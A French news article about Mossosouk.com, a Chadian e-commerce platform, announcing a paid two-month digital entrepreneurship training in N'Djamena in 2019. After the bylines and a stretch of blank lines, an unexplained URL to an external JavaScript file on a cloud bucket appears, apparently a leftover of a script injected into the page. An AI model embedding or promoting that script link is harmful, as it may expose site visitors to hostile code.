Mossosouk.com offre des formations à la digitalisation

0
501

En prélude de sa toute première formation de l’année 2019 d’une durée de deux (2) mois « Devenez un entrepreneur digital », la 1ère plateforme de e-commerce au Tchad « Mossosouk.com » a tenu, ce mardi 08 janvier 2019, dans ses locaux à Sabangali dans le 3ème arrondissement de N’Djamena, un point de presse pour éclaircir les grandes lignes de cette formation.

Pour les organisateurs, le contexte de cette formation est de vulgariser les compétences de la nouvelle économie. Pour cela, il faut avoir plus de développeurs web et mobile, des infographes, des digitaux marketings, des entrepreneurs. « La technologie affecte aujourd’hui tous les secteurs que ce soit dans l’économie, l’éducation, la politique, la santé, la culture…», explique le Directeur général de Mossosouk.com, Andreas Koumato.

Cette formation sera axée sur cinq (5) modules respectifs à savoir : Développement web ; Développement Mobile ; Infographie Design ; Digital Marketing et Entrepreneuriat. Elle se déroulera du 21 janvier au 21 mars 2019. Le cout de la formation est de 150 000 Fcfa payable en deux tranches c’est-à-dire le 1er et 2ème mois, avec une réduction de 10% et 100 000 Fcfa aux étudiants pour leur permettre de prendre part à cette formation. La formation est destinée à toute personne désirant se former dans les modules et à toutes structures, associations et entreprises.

Selon Andreas Koumato, plus d’une centaine de personnes ont été formé l’année dernière. C’est aussi une manière de répondre aux questions de l’entreprenariat digital dont les entreprises au Tchad en manque. « C’est dire pourquoi ne pas créer autour de soi et dans son propre environnement », s’exclame-t-il.

Mossosouk.com est une plateforme de e-commerce qui œuvre depuis trois ans pour permettre la flexibilité du commerce, de partage et l’économie.

Djimnayel Ngarlenan et Kita Ezéchiel

 

 

 

 

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

LAISSER UN COMMENTAIRE

S'il vous plaît entrez votre commentaire!
S'il vous plaît entrez votre nom ici